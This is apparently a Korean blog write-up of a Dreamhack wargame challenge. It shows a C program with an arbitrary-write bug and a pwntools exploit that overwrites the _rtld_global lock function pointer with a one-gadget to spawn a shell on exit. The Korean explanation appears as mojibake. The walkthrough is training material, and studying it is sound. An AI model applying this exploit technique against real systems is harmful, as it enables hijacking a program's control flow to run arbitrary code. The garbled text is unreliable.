
๋ฌธ์ ์ฝ๋๋ ๋ค์๊ณผ ๊ฐ๋ค.
// gcc -o rtld rtld.c -fPIC -pie
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <dlfcn.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(60);
}
void get_shell() {
system("/bin/sh");
}
int main()
{
long addr;
long value;
initialize();
printf("stdout: %p\n", stdout);
printf("addr: ");
scanf("%ld", &addr);
printf("value: ");
scanf("%ld", &value);
*(long *)addr = value;
return 0;
}
๋ณดํธ ๊ธฐ๋ฒ์ ๋จผ์ ํ์ธํด์ฃผ์๋ค.
Partial RELRO์ด๋ฏ๋ก GOT overwrite์ด ๊ฐ๋ฅํ๋ค.
์ฝ๋ ๋ถ์
int main()
{
long addr;
long value;
initialize();
printf("stdout: %p\n", stdout);
printf("addr: ");
scanf("%ld", &addr);
printf("value: ");
scanf("%ld", &value);
*(long *)addr = value;
return 0;
}
mainํจ์๋ฅผ ์ดํด๋ณด๋ฉด stdout ๋ผ์ด๋ธ๋ฌ๋ฆฌ ์ฃผ์๋ฅผ ์ถ๋ ฅํ๋ ๊ฑธ ํ์ธํ ์ ์๋ค.
_rtld_global_dl_rtld_lock_recursive์ oneshot gadget์ ์ฃผ์๋ก ๋ฎ์ผ๋ฉด ์์ ํ๋ํ ์ ์๋ค.
_rtld_global_dl_rtld_lock_recursive : ํจ์ ์ฃผ์
_rtld_global_dl_rtld_lock : ํจ์ ์ธ์
_rtld_global_lock_recursive์ ์๋ Libc ์ฃผ์๋ฅผ one gadget์ผ๋ก ๋ฎ์ผ๋ฉด exit ๋ ๋ one gadget์ ์คํํ ์ ์๋ค.
_Gl_exit ํจ์๋ _run_exit_handlers๋ฅผ ํธ์ถํ๋๋ฐ, _run_exit_handlers๋ Id.so์ ์กด์ฌํ๋ _dl._fini๋ฅผ ํธ์ถํ๋ค.
_di_fini
void
_dl_fini (void)
{
#ifdef SHARED
int do_audit = 0;
again:
#endif
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
{
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
_di_fini ํจ์๋ _rtld_lock_lock_recursive ํจ์๋ฅผ ํธ์ถํ๋ค.
์ด ํจ์์ ์ธ์๋ _rtld_global ๊ตฌ์กฐ์ฒด์ ๋ฉค๋ฒ์ด๋ค.
_rtld_global ๊ตฌ์กฐ์ฒด๊ฐ ์์นํ ์์ญ์ ์ฐ๊ธฐ ๊ถํ์ด ์์ด์ _rtld_lock_lock_recursive ํจ์๋ฅผ system์ผ๋ก, _dl_load_lock์ธ์๋ฅผ 'sh'๋ก ๋ฎ์ด์ธ ์ ์์ผ๋ฉด system('sh') ํธ์ถ์ด ๊ฐ๋ฅํ๋ค.
์ต์คํ๋ก์ ์ฝ๋
from pwn import *
p = remote('host3.dreamhack.games', 12058)
stdout_offset = 0x3c5620
oneshot_offset = 0xf1147
rtld_global_offset = 0x5f0040
p.recvuntil('stdout: 0x')
stdout = int(p.recvline()[:-1], 16)
libc = stdout - stdout_offset # libc base
oneshot = libc + oneshot_offset # oneshot gadget
rtld_global = libc + rtld_global_offset
p.sendlineafter('addr: ', str(rtld_global + 3848))
p.sendlineafter('value: ', str(oneshot))
p.interactive()
'DreamHack > SystemHacking' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[Dreamhack System Hacking] SigReturn-Oriented Programming (0) | 2022.11.14 |
---|---|
[Dreamhack System Hacking] SROP (0) | 2022.11.14 |
[DreamHack System Hacking] __eviron (0) | 2022.09.21 |
[DreamHack System Hacking] Linux Library exploit > __environ (0) | 2022.09.21 |
[DreamHack System Hacking] Linux Library exploit > overwrite _rtld_global (1) | 2022.09.21 |